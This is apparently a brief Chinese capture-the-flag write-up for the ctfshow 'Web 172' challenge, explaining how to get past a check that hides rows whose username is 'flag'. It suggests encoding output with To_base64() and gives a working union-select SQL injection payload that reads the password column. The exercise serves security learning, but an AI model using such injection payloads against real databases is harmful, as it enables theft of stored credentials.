SQL注入：flag不能出现在查询当中

Web 172:

//检查结果是否有flag

&nbsp;&nbsp;&nbsp; if($row->username!=='flag'){

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ret['msg']='查询成功';

&nbsp;&nbsp;&nbsp; }

这里是检查我们查询的是否存在flag字样

我们可以使用加密：

To_base64()这样的方式绕过，但也可以直接强制转化username为1

99' union select 1,password from ctfshow_user2 where username='flag'%23

RIPRO主题是一个优秀的主题，极致后台体验，无插件，集成会员系统
天云网络培训 » SQL注入：flag不能出现在查询当中

分享到：